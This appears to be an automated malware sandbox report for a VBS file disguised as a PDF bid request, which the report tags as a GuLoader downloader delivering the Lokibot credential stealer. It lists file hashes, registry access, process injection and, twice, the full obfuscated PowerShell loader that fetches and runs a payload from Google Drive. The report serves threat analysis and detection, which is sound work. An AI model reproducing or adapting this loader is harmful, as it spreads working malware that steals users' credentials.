memory/1804-26-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

memory/1804-27-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

memory/1804-28-0x000007FEF5E0E000-0x000007FEF5E0F000-memory.dmp

memory/1804-29-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\94ZGO2OZ9LUF4Q5UDT7R.temp

MD5 dfb4b58fc7ce81946c214dc3b838e830
SHA1 678c6952abe45d59adbc12936f840674473bb92b
SHA256 07028e39e9efc5c52c67a93a018b5699c790308c77138fd93b0ba4c4d0cf20e3
SHA512 44e96fc3fd52494b8b20c6057559f164f35d25030639cfc9bd2052b1ad2e56043650b68a2daeab148b5c355d17d22e6c7a7f88986dd0f40c9c540120fad19371

C:\Users\Admin\AppData\Roaming\Carbines.Que

MD5 fed7d2b1a62075a148249e5d86063b30
SHA1 f2e3c9605313437d6dc1668982f8d8c21d42d75d
SHA256 c31da00f237eeb4bc98b2d1396d5bdb56c51c18d4ede431dcd6049e4a78f18ba
SHA512 66f6fa6b5af2c09bee449cc9560194fa82a23affc4c90e2e3698458fab319a50163f5b581e8ff734dd7de6d0a12151d10c0b6011f3346f6568becc6707675450

memory/3012-35-0x0000000006650000-0x000000000A1BE000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 04435b5b0faeee5b6f78f2f903485c37
SHA1 5fd52ecc46cdef71486ae57041e3092ba3e76720
SHA256 ff4ca775e52e64ceeef691617585ecc48285106a563fa7e4273822e65fc0873c
SHA512 bee3aaff10bec88e3347b5a93aeb83e7fb9ef6532f1ded41d259a75e52f12ac47f4bc51fe653d5d4fcdd50c79f6c4e80ec58dc7e208047017075d1496939dd7f

C:\Users\Admin\AppData\Local\Temp\Tar35C1.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/1568-59-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1568-60-0x0000000000C70000-0x00000000047DE000-memory.dmp

memory/1804-61-0x000007FEF5B50000-0x000007FEF64ED000-memory.dmp

memory/1568-68-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1568-67-0x0000000000C70000-0x00000000047DE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-09 14:43

Reported

2024-09-09 14:45

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2820 set thread context of 4024 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3016 wrote to memory of 3568 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 3568 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3568 wrote to memory of 3068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 3068 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3568 wrote to memory of 2820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3568 wrote to memory of 2820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3568 wrote to memory of 2820 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 64 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2820 wrote to memory of 64 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2820 wrote to memory of 64 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2820 wrote to memory of 4912 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4912 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4912 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 1776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 1776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 1776 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 3616 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 3616 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 3616 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4352 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4352 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4352 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 1928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 1928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 1928 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4988 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4988 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4988 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 5048 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 5048 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 5048 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 860 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 2360 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 2360 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 2360 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4764 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4764 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4764 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 2464 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 2464 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 2464 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2820 wrote to memory of 4688 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2820 wrote to memory of 4688 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2820 wrote to memory of 4688 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2820 wrote to memory of 4024 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2820 wrote to memory of 4024 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2820 wrote to memory of 4024 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2820 wrote to memory of 4024 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
PID 2820 wrote to memory of 4024 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness (splenoid 'U.dgl$BugseNTiffiasecultPluddtSnakeeVe sdtOverhistrmsmMoyoreOverpnBlusesCh am.SofisHHidsieDeat a Nat,dgermie Subcr DrifsAwnsb[ Nort$polygCSkamsiEkspon KomecFiresh KafkoFlexulPre.roSvrmeiSilkepIsol,oC wshnMaa.b]Besty=Lykns$SkrslA,pecidT,pefaBushapelectt Whari TrihogriecnSkrive.karlrTraw.nIlioce FyrmsFaktu ');$theriatrics=splenoid 'En.ot$Tid bNsubl.aMedaktEf,ertSlette Recot Min iOve pmVaareeSta dnIndeksOblat.CorroD.undeoSpec,w EskanCha.ulOutlaoDiffeaD nerd IndbFRa.noi Dea.lHousee Prog( ille$OutspdMelleeForsbkKvlstokrydsdaffrinFa,thi FaminKlaphgHl rieVavatrVentenFina eSubor,.nsca$RespeT pre,esol nr odeorHypoxnO.natsTors.pTmredoLogarrDysmnt inds)serai ';$Terrnsport=$Opvisning[0];Respirableness (splenoid ' L.ly$Ubluvg,olveldiag.oOp.tabLeg taImmollStrmf:HeadwBMark.eRhynct ,atioSolstnDati,h ouchjApennt nilltReflea BygglBjergeManhar TppeeUnmar= Do,b(OkshoTAnt,feRgtersroyaltKjes,- ResgP Ma.eaUntittC,ffehDese Comp$ Sce T F.rfeAadserBetalrDrninngame.s EpippSvagso DougrDismotDiarr) G,tl ');while (!$Betonhjttalere) {Respirableness (splenoid '.vens$ ,pong HelulPsykooSchmab UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sardellerne='flowerier';$Otocranial=${host}.Runspace;If ($Otocranial) {$Oompahed++;$Sardellerne+='lejemordere';$Laryngograph='su';$Sardellerne+='Undonkey';$Laryngograph+='bs';$Sardellerne+='Premodified';$Laryngograph+='tri';$Sardellerne+='Pornograph';$Laryngograph+='ng';};Function splenoid($Frysnings){$Chankings=$Frysnings.Length-$Oompahed;For( $Utaknemlighedernes=5;$Utaknemlighedernes -lt $Chankings;$Utaknemlighedernes+=6){$debasements+=$Frysnings.$Laryngograph.'Invoke'( $Utaknemlighedernes, $Oompahed);}$debasements;}function Respirableness($Recidivets){ & ($Demarkernes) ($Recidivets);}$Adaptionernes=splenoid ' SkraMAmicooDecalz NonciAntrolInf.nlTaygeaMult./Bla f5decen.Aroma0Indva M.xim(Se esW Xa.ti AllonUnmoddKapruoKontrwSubjusNoneg HurriN.atraT Efte Alist1A,iss0Ab.nd.,kabe0Regis;Panpi ChimlW RageiMonobnVar n6Melan4Thron;Merka D.cerxVasal6Calci4Bifro;De,in HopscrSierrvvasti:Light1Pr,sp2Maerk1 B,el.heala0Came,)Stnke L,parG StudeDropsc FatwkA.rocoKadmi/Enven2Barog0Reada1Livsl0Kvidi0Netop1Maski0Sp.ck1Nona. BlooF alki BurrrAfv,seLiberfDemisoUnquaxMe.us/Medic1Rekey2Bnken1Straf.Un ki0 Kon ';$Cincholoipon=splenoid ' TalbU Sa,rsLienoeEpithrQuiet-C,uldASalsig FunkeArkain U retBdean ';$dekodningerne=splenoid 'Mi,ichWaivetudskrtma.papNak osGalla:Eel,o/Mo il/ Ped,dStd.irTe peiHerinvGimpeeBaneg.MignogT.pisoSkrteoAktivgGrumml,lyaee,ecei.lawsucHawkio Recom slri/ Minuu bic cMi,li? F sceUnshuxGramppBedr.o DiscrGlisstAu,ok= NonddDepo oF,rbrw BasinhaslolAut coUncreaslidsdFyrpa&Vict.iCrusadFavnm=Beats1SubjuvMetri7 NonvaOrthoJAnh.l4HngetS SampHsvejsQ O,spyalfae8Ver,sh SvmmW,isiouForsteTubis2TegumeReumaBSheasF sndat PropKB ggeR ForbDUte,omMisidL UndiuFusioqApathlBveruUDruidHSjllaBIngloCQuin,H Midr ';$Lillefingers=splenoid 'Trans> No,e ';$Demarkernes=splenoid 'r dsaiB.sideRetrixAmori ';$Folmar61='Haartoppes';$Doctrinarian = splenoid ' CytoePrecocChaushalteroR.gir Fletk%Telefa Omnip FunkpQueendTournaBuddht CritaEx,ra%Mtaal\TreaaCI.ecoaPe,amrMuseubOverriPaagrnUdydeeSump.sS ump.MelleQHornfu,visleDekad Ch.c&Baja.& astl isave S,aac GlychLobbyoQ.adr Paatvtaaben ';Respirableness (splenoid 'Unhou$Uncolg D,molGasteoUudrybQuiniaUltralFa.ta:pacifO SkovpNontevMar.iiMountsJazzbnbeck.i VrdinBl,mrg fors=Overl( RecicPavilm knyrd Aleu Dovek/TrodscCochl Boggi$F iheDA ieroDolomc Regit afterUfejliatr,bnFyrreaPacker Fjeni ForsaSti,bnCan e) will ');Respirableness (splenoid 'c tra$ prjg Invil PrivoMellebKlepha Naphl djun:KighoMMich,aMo,teiPotshu naccsOrphr=,utcl$AsperdMimreeColo.kU.stuo BrysdOksehn sseri NegenG mmagg lvteGyromrUdsalnEffroeHusal.MosrosGennepLinjelPrintiReapptsemic(Lab,o$DunhaLKom eiUncrilRekorlVkstheNed.afAnsvaiArgennEsk dgmillseCeci,rPers,sPopul) Baro ');Respirableness (splenoid 'Kr,gs[SvensN Forge syn t Meun. PatrSAnklaeAnabrrUdsenvMilliiLgebgcA.seteWom nPKladdoTurrii Eks nOuvertPreflMgibina P etnPaah.aDomflgAfhsteS riarSerru] h,pt:.plif:Su coSUne,eeOpelscDriftuBooterAttitiPlesitWindoyStjgrPBrugtrRefaso.alantIs,leoMaa rcAnbajo Undil Salt Guzz =.igen Tromp[axolyN,ulfoeOxonotK.rrw.gangaSLexinePseudcAfteruCigarr SamliMod,etOphreydriftPMislir FahloG,ebntAgtsooheintcWiretoCrumhl Una TCottoy BilbpCo,taeAl.eh]mbelf:Koord:Inte T Arg,l BegisDeesc1Occas2Rodte ');$dekodningerne=$Maius[0];$Sporvognssljferne= (splenoid 'H,dje$Q ilag MnstlK.lpooSl tjbS,ineaNonnol akti:OlympNDrmmea ntert P,astClipteVskertge.iti UnmemBankne tithn K.ncs Jupo=LeptoN D,etePeasewDatal-SympaOOzonibSmurtjtildee RunkcBe,obtJ.ani Un,erS nkny SkuesDiptetLinjee SkudmDesul.Cu.icN.earbeK.mpetAmaz . Te,aW Begre .nhybPeppiCFibrolUnpreiHumaneStarvn Un,et');$Sporvognssljferne+=$Opvisning[1];Respirableness ($Sporvognssljferne);Respirableness 